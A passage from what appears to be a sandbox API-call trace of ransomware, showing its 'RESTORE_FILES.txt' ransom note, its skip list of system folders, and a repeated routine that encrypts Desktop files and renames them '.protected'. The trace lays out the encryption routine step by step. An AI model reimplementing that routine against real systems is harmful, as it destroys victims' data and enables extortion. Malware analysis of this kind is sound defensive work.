(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.239] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.239] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.239] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.239] CloseHandle (hObject=0xb4) returned 1 [0091.240] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.240] lstrcmpiW (lpString1="9-17bDytB l.mp3", lpString2="Windows") returned -1 [0091.240] lstrcmpiW (lpString1="9-17bDytB l.mp3", lpString2="Program Files") returned -1 [0091.240] lstrcmpiW (lpString1="9-17bDytB l.mp3", lpString2="Program Files (x86)") returned -1 [0091.240] lstrcmpiW (lpString1="9-17bDytB l.mp3", lpString2="$Recycle.bin") returned 1 [0091.240] lstrcmpiW (lpString1="9-17bDytB l.mp3", lpString2="System Volume Information") returned -1 [0091.240] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3") returned 57 [0091.240] StrStrIW (lpFirst="9-17bDytB l.mp3", lpSrch=".protected") returned 0x0 [0091.240] lstrcmpW (lpString1="9-17bDytB l.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0091.240] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.240] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-17bdytb l.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3") returned 57 [0091.241] StrStrW (lpFirst="9-17bDytB l.mp3", lpSrch=".txt") returned 0x0 [0091.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3") returned 57 [0091.241] StrStrW (lpFirst="9-17bDytB l.mp3", lpSrch=".rar") returned 0x0 [0091.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3") returned 57 [0091.241] StrStrW (lpFirst="9-17bDytB l.mp3", lpSrch=".zip") returned 0x0 [0091.241] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.242] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.242] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.242] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.242] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.242] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.242] CloseHandle (hObject=0xb4) returned 1 [0091.243] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3.protected") returned 67 [0091.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-17bdytb l.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-17bdytb l.mp3.protected")) returned 1 [0091.244] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.244] lstrcmpiW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="Windows") returned -1 [0091.244] lstrcmpiW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="Program Files") returned -1 [0091.244] lstrcmpiW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="Program Files (x86)") returned -1 [0091.245] lstrcmpiW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="$Recycle.bin") returned 1 [0091.245] lstrcmpiW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="System Volume Information") returned -1 [0091.245] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv") returned 65 [0091.245] StrStrIW (lpFirst="bY2I98UZEgtfX uPDzh.csv", lpSrch=".protected") returned 0x0 [0091.245] lstrcmpW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="RESTORE_FILES.txt") returned -1 [0091.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\by2i98uzegtfx updzh.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv") returned 65 [0091.245] StrStrW (lpFirst="bY2I98UZEgtfX uPDzh.csv", lpSrch=".txt") returned 0x0 [0091.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv") returned 65 [0091.245] StrStrW (lpFirst="bY2I98UZEgtfX uPDzh.csv", lpSrch=".rar") returned 0x0 [0091.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv") returned 65 [0091.245] StrStrW (lpFirst="bY2I98UZEgtfX uPDzh.csv", lpSrch=".zip") returned 0x0 [0091.245] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.246] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.246] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.246] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.246] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.246] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.246] CloseHandle (hObject=0xb4) returned 1 [0091.247] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv.protected") returned 75 [0091.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\by2i98uzegtfx updzh.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\by2i98uzegtfx updzh.csv.protected")) returned 1 [0091.248] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.248] lstrcmpiW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="Windows") returned -1 [0091.248] lstrcmpiW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="Program Files") returned -1 [0091.248] lstrcmpiW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="Program Files (x86)") returned -1 [0091.248] lstrcmpiW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="$Recycle.bin") returned 1 [0091.248] lstrcmpiW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="System Volume Information") returned -1 [0091.248] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3") returned 66 [0091.248] StrStrIW (lpFirst="bysT_gv2vLx7hp5rloyi.mp3", lpSrch=".protected") returned 0x0 [0091.248] lstrcmpW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0091.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\byst_gv2vlx7hp5rloyi.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3") returned 66 [0091.249] StrStrW (lpFirst="bysT_gv2vLx7hp5rloyi.mp3", lpSrch=".txt") returned 0x0 [0091.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3") returned 66 [0091.249] StrStrW (lpFirst="bysT_gv2vLx7hp5rloyi.mp3", lpSrch=".rar") returned 0x0 [0091.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3") returned 66 [0091.249] StrStrW (lpFirst="bysT_gv2vLx7hp5rloyi.mp3", lpSrch=".zip") returned 0x0 [0091.249] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.249] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.249] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.249] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.250] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.250] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.250] CloseHandle (hObject=0xb4) returned 1 [0091.250] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3.protected") returned 76 [0091.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\byst_gv2vlx7hp5rloyi.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\byst_gv2vlx7hp5rloyi.mp3.protected")) returned 1 [0091.251] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.251] lstrcmpiW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="Windows") returned -1 [0091.251] lstrcmpiW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="Program Files") returned -1 [0091.251] lstrcmpiW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="Program Files (x86)") returned -1 [0091.251] lstrcmpiW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="$Recycle.bin") returned 1 [0091.251] lstrcmpiW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="System Volume Information") returned -1 [0091.251] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx") returned 61 [0091.251] StrStrIW (lpFirst="CPU9r_M2xeJXGI.pptx", lpSrch=".protected") returned 0x0 [0091.251] lstrcmpW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.251] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.251] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cpu9r_m2xejxgi.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx") returned 61 [0091.252] StrStrW (lpFirst="CPU9r_M2xeJXGI.pptx", lpSrch=".txt") returned 0x0 [0091.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx") returned 61 [0091.252] StrStrW (lpFirst="CPU9r_M2xeJXGI.pptx", lpSrch=".rar") returned 0x0 [0091.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx") returned 61 [0091.252] StrStrW (lpFirst="CPU9r_M2xeJXGI.pptx", lpSrch=".zip") returned 0x0 [0091.252] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.253] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.253] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.253] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.253] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.253] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.253] CloseHandle (hObject=0xb4) returned 1 [0091.253] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx.protected") returned 71 [0091.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cpu9r_m2xejxgi.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cpu9r_m2xejxgi.pptx.protected")) returned 1 [0091.254] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.254] lstrcmpiW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="Windows") returned -1 [0091.254] lstrcmpiW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="Program Files") returned -1 [0091.254] lstrcmpiW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="Program Files (x86)") returned -1 [0091.254] lstrcmpiW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="$Recycle.bin") returned 1 [0091.254] lstrcmpiW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="System Volume Information") returned -1 [0091.254] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc") returned 65 [0091.255] StrStrIW (lpFirst="d81mceAyH3Zi _M-J-W.doc", lpSrch=".protected") returned 0x0 [0091.255] lstrcmpW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="RESTORE_FILES.txt") returned -1 [0091.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d81mceayh3zi _m-j-w.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc") returned 65 [0091.255] StrStrW (lpFirst="d81mceAyH3Zi _M-J-W.doc", lpSrch=".txt") returned 0x0 [0091.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc") returned 65 [0091.255] StrStrW (lpFirst="d81mceAyH3Zi _M-J-W.doc", lpSrch=".rar") returned 0x0 [0091.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc") returned 65 [0091.255] StrStrW (lpFirst="d81mceAyH3Zi _M-J-W.doc", lpSrch=".zip") returned 0x0 [0091.255] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.256] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.256] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.256] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.256] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.256] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.256] CloseHandle (hObject=0xb4) returned 1 [0091.256] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc.protected") returned 75 [0091.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d81mceayh3zi _m-j-w.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d81mceayh3zi _m-j-w.doc.protected")) returned 1 [0091.257] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.257] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.257] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.257] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.257] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.257] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.257] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0091.257] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.257] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.257] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.258] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js 